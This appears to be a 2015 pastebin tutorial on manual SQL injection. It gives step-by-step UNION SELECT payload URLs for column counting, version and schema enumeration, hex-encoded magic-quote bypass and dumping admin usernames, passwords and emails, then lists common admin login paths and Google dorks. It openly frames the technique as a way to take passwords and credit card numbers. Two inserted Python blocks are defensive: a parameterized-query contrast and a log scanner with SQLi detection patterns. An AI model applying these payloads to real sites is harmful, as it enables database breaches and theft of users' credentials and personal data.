dcomicboy

SQLi Tutorial

Feb 2nd, 2015
cheat sheet for manual SQLi

1.) First find something exploitable, either with dorks or by browsing your favorite site and trying different links.

Here's a testing dork that works fairly well:
buy.php?id=

2.) To check if it's exploitable, simply add a ' before or after the number:

http://example.com/buy.php?id='1
or
http://example.com/buy.php?id=1'

If you get a warning about mysql_fetch_array, or any sort of error at all, that means it's exploitable.

If the URL you pick looks something like this:

http://example.com/buy.php?id=1&food;cid=2

you have to set it up for vulnerability testing like this:

http://example.com/buy.php?id='1&food;cid='2
or
http://example.com/buy.php?id=1'&food;cid=2'

Once you know it's exploitable and injectable, move on to the next step!

3.) In this step we will determine the number of columns in the table. To do this, simply use an "ORDER BY" clause like so:

http://example.com/buy.php?id=1 ORDER BY 1--

How I speed up this process: I mostly start with a giant number like 100 and divide by 2 on my way down. You've found the number of columns when the errors stop... like this:

http://example.com/buy.php?id=1 ORDER BY 100-- < Error
http://example.com/buy.php?id=1 ORDER BY 50-- < Error
http://example.com/buy.php?id=1 ORDER BY 25-- < Error
http://example.com/buy.php?id=1 ORDER BY 10-- < Error
http://example.com/buy.php?id=1 ORDER BY 5-- < Error
http://example.com/buy.php?id=1 ORDER BY 4-- < No Error

Site has 4 columns.

From here, we move on to figuring out WHICH column is the exploitable one.

4.) This is a fairly simple step. We're going to display the columns, and whichever one pops up on screen is the one that's exploitable.

http://example.com/buy.php?id=-1 UNION SELECT 1,2,3,4--

The number of the column... we'll say it was 2 for this... should pop up SOMEWHERE on the page, usually at the top.
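
Steps 2 to 4 only work because the application splices the raw ?id= value into the SQL text. The following Python/sqlite3 snippet is an added editorial example, not part of dcomicboy's paste: it builds a constructed four-column table, runs the page's own probes through a lookup written with string concatenation and through one written with a bound parameter, and returns the outcome of each so the two behaviours sit side by side. The table, its columns and the function names are assumptions.

```python
import sqlite3

# Constructed stand-in for the tutorial's buy.php backend (assumption):
# a four-column table, which is what the ORDER BY probes in step 3 discover.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER, name TEXT, price REAL, stock INTEGER)")
    conn.executemany("INSERT INTO items VALUES (?, ?, ?, ?)",
                     [(1, "apple", 0.5, 10), (2, "bread", 2.0, 3)])
    conn.commit()
    return conn

def lookup_vulnerable(conn, item_id):
    """The injectable pattern: the raw ?id= value is spliced into the SQL text,
    so a quote, ORDER BY or UNION SELECT is parsed as SQL."""
    sql = "SELECT id, name, price, stock FROM items WHERE id=" + item_id
    return conn.execute(sql).fetchall()

def lookup_safe(conn, item_id):
    """The hardened form: the value is bound as a parameter. Whatever the
    string contains, it is compared against id as data, never parsed."""
    sql = "SELECT id, name, price, stock FROM items WHERE id=?"
    return conn.execute(sql, (item_id,)).fetchall()

def probe(fn, conn, item_id):
    """Run one lookup and report ('rows', rows) or ('error', message),
    mirroring what the tutorial reads off the screen: an error page or data."""
    try:
        return ("rows", fn(conn, item_id))
    except sqlite3.Error as exc:
        return ("error", str(exc))

# The tutorial's probes from steps 2-4, exactly as they would arrive in ?id=
PROBES = [
    "1'",                         # step 2: breaks the syntax
    "1 ORDER BY 5--",             # step 3: one past the real column count
    "1 ORDER BY 4--",             # step 3: matches the column count
    "-1 UNION SELECT 1,2,3,4--",  # step 4: marker row
]

if __name__ == "__main__":
    conn = make_db()
    for p in PROBES:
        print(f"{p!r:32} concat -> {probe(lookup_vulnerable, conn, p)}")
        print(f"{'':32} bound  -> {probe(lookup_safe, conn, p)}")
```

The concatenated version reproduces what the page describes (a syntax error for the quote, ORDER BY failing above 4 and passing at 4, the 1,2,3,4 marker row coming back), while the bound version treats every one of those strings as an id value that matches nothing. The PHP equivalent of lookup_safe is a mysqli or PDO prepared statement with a bound parameter instead of a query assembled from $_GET.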

5.) Now we need to figure out the name of the database we're working with. First we need to determine the SQL version. For this, we use the exploitable column we found. We used 2 in the last example, so we'll keep it uniform with 2 here.

example
http://example.com/buy.php?id=-1 UNION SELECT 1,@@version,3,4--

Since 2 was the vulnerable column, this is where @@version belongs. The version will show up in the same place you found the 2 for the exploitable column.

If the version shows up and it looks like it's in hexadecimal, simply use the unhex command like so:

http://example.com/buy.php?id=-1 UNION SELECT 1,unhex(hex(@@version)),3,4--

If unhex is used here, you have to use it for the rest of the injection as well.

The version should look something like the example below:

Example: 5.2-community-log

That's the version!

Note: If you come across version 4.x, you'll need a different tutorial, as the injection is different.

6.) Finding the database. This isn't something you always HAVE to do, but it is useful for dumping purposes.

To find the DB, you need to use a query like the example:

http://example.com/buy.php?id=-1 UNION SELECT 1,group_concat(schema_name),3,4 from information_schema.schemata--

This should get you more results than the database() method below; either one works.

http://example.com/buy.php?id=-1 UNION SELECT 1,concat(database()),3,4--

Now you have the DB!

7.) Now the fun stuff :P

This is where you get usernames, passwords, credit card numbers, addresses, phone numbers... almost anything you want from the DB.

Finding the table names. This is important so you know where to actually look for the information. To do this, see the query example below:

http://example.com/buy.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--

It may look a little confusing and like a lot of work, but it really isn't.
Basically what this does is group (group_concat) the "table names" (table_name) together and gather that info "from" (FROM) information_schema.tables where the "table schema" (table_schema) is the current "database" (database()).

While using group_concat, you will only be able to see 1024 characters' worth of table names. So, if you notice that the list just randomly cuts off, you'll need to use LIMIT. See the example:

http://example.com/buy.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1--

What this does is show you only the first table. If you ran out of characters at, let's say, the 30th table, you could use it like this:

http://example.com/buy.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database() LIMIT 29,1--

Now the limit is 29,1... Why is that? Because LIMIT offsets start at 0 (LIMIT 0,1 is the first table), so offset 29 is actually the 30th table.

Now you have table names, congrats! You're so close!

8.) Getting the column names. You got the table, but that's not enough to extract data, so you need the column names as well. Usually they're easy to guess, such as User(s), Admin(s), tblUser(s), tblAdmin(s), etc., but it honestly varies.

After deciding which table you think contains what you're looking for, use the following query... note that I'm using the Admin table name:

http://example.com/buy.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="Admin"--

This will give you a list of all the columns within the table, OR give you an error, but the error is nothing to worry about. All it means is that "Magic Quotes" is turned on. This can be easily bypassed by using a hex or char converter to convert the normal text into char or hex. A link to a hex and char converter is below.

Hex/Char Converter
http://www.swingnote.com/tools/texttohex.php

If you get an error at this point, you must do the following steps:

1.) Copy the name of the table that you're trying to access.
2.) Paste the name of the table into the converter above where it says "Say hello to my little friend".
3.) Click convert.
4.) Copy the string of numbers/letters under hex into your query so it looks like the following:

http://example.com/buy.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x41646d696e--

Notice the 0x that's added; this tells the server that the characters are a hex string, that's all.

From there, you should see a list of columns within the table such as username, password, email, id, etc.
Using LIMIT works here as well.

9.) Displaying the column content. The home stretch!

If you've made it this far, congrats! You've basically completed your task of SQL injection manually without any script kiddy tools!

All that's left to do is see what's in the columns and use the information! We need to decide which columns we want to see and use the query below (note I'm using username, password, email and id; the DB will be named "mydb1234"). This is where the database name comes in handy:

http://example.com/buy.php?id=-1 UNION SELECT 1,group_concat(username,0x3a,password,0x3a,email,0x3a,id),3,4 FROM mydb1234.Admin--

In this query, 0x3a is the hex value of a colon (:), which joins username:password:email:id for each individual user! Simple, right?!
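
Every probe in steps 2 to 9 travels in the query string, so a plain web-server access log is usually enough to spot this activity after the fact. The Python below is an added example, not from the paste: it parses a constructed Apache-style log excerpt (the requests are the tutorial's own URLs, percent-encoded as a browser sends them; the IPs and timestamps are made up), URL-decodes each query string, matches it against a small signature list covering the fragments each step leaves behind, annotates 0x hex literals with their ASCII reading (the page's 0x41646d696e is "Admin"), and counts flagged requests per client. The signature names and the log lines are constructed.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache-style access-log excerpt. The requests are the tutorial's
# own probe URLs, percent-encoded as a browser would send them; the IPs and
# timestamps are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [02/Feb/2015:10:01:02 +0000] "GET /buy.php?id=1 HTTP/1.1" 200 5120
203.0.113.5 - - [02/Feb/2015:10:01:09 +0000] "GET /buy.php?id=1' HTTP/1.1" 500 311
203.0.113.5 - - [02/Feb/2015:10:01:30 +0000] "GET /buy.php?id=1%20ORDER%20BY%20100-- HTTP/1.1" 500 311
203.0.113.5 - - [02/Feb/2015:10:02:15 +0000] "GET /buy.php?id=-1%20UNION%20SELECT%201,2,3,4-- HTTP/1.1" 200 4870
203.0.113.5 - - [02/Feb/2015:10:03:40 +0000] "GET /buy.php?id=-1%20UNION%20SELECT%201,group_concat(column_name),3,4%20FROM%20information_schema.columns%20WHERE%20table_name=0x41646d696e-- HTTP/1.1" 200 4902
198.51.100.7 - - [02/Feb/2015:10:04:00 +0000] "GET /buy.php?id=2&cid=7 HTTP/1.1" 200 5098
"""

# Common log format: client, identd, user, [timestamp], "METHOD path PROTO", status, bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures for the query-string fragments each tutorial step leaves behind.
SIGNATURES = [
    ("single quote",       re.compile(r"'")),
    ("sql comment",        re.compile(r"--|/\*")),
    ("order by probe",     re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union select",       re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\b", re.I)),
    ("group_concat",       re.compile(r"\bgroup_concat\s*\(", re.I)),
    ("@@version",          re.compile(r"@@version", re.I)),
    ("hex literal",        re.compile(r"\b0x[0-9a-f]+\b", re.I)),
]

HEX_RE = re.compile(r"\b0x([0-9a-f]+)\b", re.I)

def decode_hex_literals(text):
    """Annotate 0x... literals with their ASCII reading, e.g. 0x41646d696e[Admin],
    so the analyst sees the table name that was hidden behind hex."""
    def annotate(match):
        try:
            decoded = bytes.fromhex(match.group(1)).decode("ascii")
        except ValueError:          # odd digit count or non-ASCII bytes: leave it alone
            return match.group(0)
        if not decoded.isprintable():
            return match.group(0)
        return f"{match.group(0)}[{decoded}]"
    return HEX_RE.sub(annotate, text)

def scan_log(log_text):
    """Return one finding per request whose decoded query string matches a signature."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue                # not a request line in the expected format
        query = unquote_plus(urlsplit(m.group("path")).query)
        hits = [name for name, rx in SIGNATURES if rx.search(query)]
        if hits:
            findings.append({
                "line": lineno,
                "ip": m.group("ip"),
                "status": m.group("status"),
                "query": decode_hex_literals(query),
                "hits": hits,
            })
    return findings

def summarize_by_ip(findings):
    """Flagged-request count per client: one hit may be a typo, a run is a scan."""
    return dict(Counter(f["ip"] for f in findings))

if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for f in results:
        print(f"line {f['line']:>2} {f['ip']:<13} HTTP {f['status']}  {', '.join(f['hits'])}")
        print(f"        {f['query']}")
    print("flagged requests per client:", summarize_by_ip(results))
```

The single-quote signature on its own will fire on legitimate apostrophes in search terms, so treat it as a weak signal: the useful alert is the per-client count combined with the stronger signatures (UNION SELECT, information_schema, group_concat) and the 500 responses that the step 2 and step 3 probes produce on a site built the way the tutorial assumes.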

Guess what! You're done! You got the info! Now all you need to do is find the admin login! This can be simple.

10.) Finding an admin page or login page...

Most devs are either stupid or just don't care because they think they're better than they are and hide these in plain sight... below are some of the login locations I've seen the most:

http://example.com/admin
http://example.com/apanel
http://example.com/wp-admin (this would be a wordpress site)
http://example.com/wp-login.php (also wordpress specific)
http://example.com/login.php
http://example.com/user/login.php
http://example.com/users/login.php
http://example.com/modlogin/
http://example.com/mod/
http://example.com/moderator

You get the picture. You can also use Google to try to find the admin page, but that only works about 40 percent of the time. For that you'd want to search something like:

inurl:admin|login|user|wp-admin "example.com"
or
example intitle:"admin|login|user"

The "|" operators tell Google to look specifically for those words, whereas the "+" you may know from searches turns it into a full string.

It's very easy to find a dork list as well... if you'd like to find one, just google it with the following:

inurl:pastebin "google+dork"

You're done!